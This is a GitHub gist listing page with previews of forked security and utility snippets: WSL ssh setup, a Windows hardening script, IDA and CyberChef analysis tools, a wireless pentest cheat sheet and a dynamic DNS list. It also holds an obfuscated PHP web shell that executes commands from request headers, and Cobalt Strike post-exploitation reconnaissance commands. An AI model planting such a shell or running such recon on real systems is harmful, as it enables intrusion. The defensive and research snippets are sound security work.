Tuan T tuantmb

@tuantmb
tuantmb / WSL-ssh-server.md
Created February 18, 2020 03:49 — forked from dentechy/WSL-ssh-server.md
A step by step tutorial on how to automatically start ssh server on boot on the Windows Subsystem for Linux

How to automatically start ssh server on boot on Windows Subsystem for Linux

Microsoft partnered with Canonical to create Bash on Ubuntu on Windows, running through a technology called the Windows Subsystem for Linux. Below are instructions on how to set up the ssh server to run automatically at boot.

  1. Edit the /etc/ssh/sshd_config file by running the command sudo vi /etc/ssh/sshd_config and do the following:
    1. Change Port to 2222 (or any other port above 1000)
    2. Change PasswordAuthentication to yes. This can be changed back to no once ssh keys are set up.
  2. Restart the ssh server:
    • sudo service ssh --full-restart
  3. With this setup, the ssh server must be turned on every time you run Bash on Ubuntu on Windows, as by default it is off. Use this command to turn it on:
@tuantmb
tuantmb / windows_hardening.cmd
Created March 10, 2020 05:21 — forked from api0cradle/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@tuantmb
tuantmb / cobaltstrike_sa.txt
Created March 10, 2020 10:49 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@tuantmb
tuantmb / ida_memdump.py
Created April 25, 2020 02:56 — forked from herrcore/ida_memdump.py
Dump a blob of memory into a file - IDA Pro script
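import idautils
import idaapi
import idc  # needed for GetManyBytes below


def memdump(ea, size, file):
    # Read `size` bytes starting at address `ea` from the IDA database.
    # GetManyBytes is the pre-7.4 IDAPython name; newer releases call it idc.get_bytes.
    data = idc.GetManyBytes(ea, size)
    # Write the raw bytes to the output file.
    with open(file, "wb") as fp:
        fp.write(data)
    print("Memdump Success!")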

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Enable monitor mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@tuantmb
tuantmb / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created May 4, 2020 09:48 — forked from 0xtornado/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@tuantmb
tuantmb / readme.md
Created May 8, 2020 08:09 — forked from psiborg/readme.md
Apple Magic Mouse and Windows 10 #windows
  1. Download the latest version of the "Boot Camp Support Software" (e.g., 5.1.5722) from https://support.apple.com/downloads/bootcamp
  2. Unzip the file (e.g., bootcamp5.1.5722.zip) to a new directory
  3. Run BootCamp\Drivers\Apple\AppleWirelessMouse64.exe
  4. Turn on Bluetooth and pair your Magic Mouse

Note: Apple wireless mouse devices have a built-in passcode of "0000" (four zeros).

@tuantmb
tuantmb / rev_shell.php
Created May 8, 2020 11:35 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
# nginx@nginx:~$ cat /etc/nginx/sites-available/outlook.conf
server {
    listen 192.168.128.2:80;
    server_name yourdomain.com;
    return 301 https://yourdomain.com$request_uri;
}
server {
    listen 192.168.128.2:443;
@tuantmb
tuantmb / dynamic-dns.txt
Created June 4, 2020 07:03 — forked from neu5ron/dynamic-dns.txt
List of Dynamic DNS Domains/FQDNs. Make sure to download this as a ZIP, because the list is so long it won't display fully in a web browser; even the "Raw" link won't work. The ZIP link is in the top right, labeled "Download ZIP". For a list of dynamic DNS providers see: https://gist.github.com/neu5ron/860c158180e01b61a524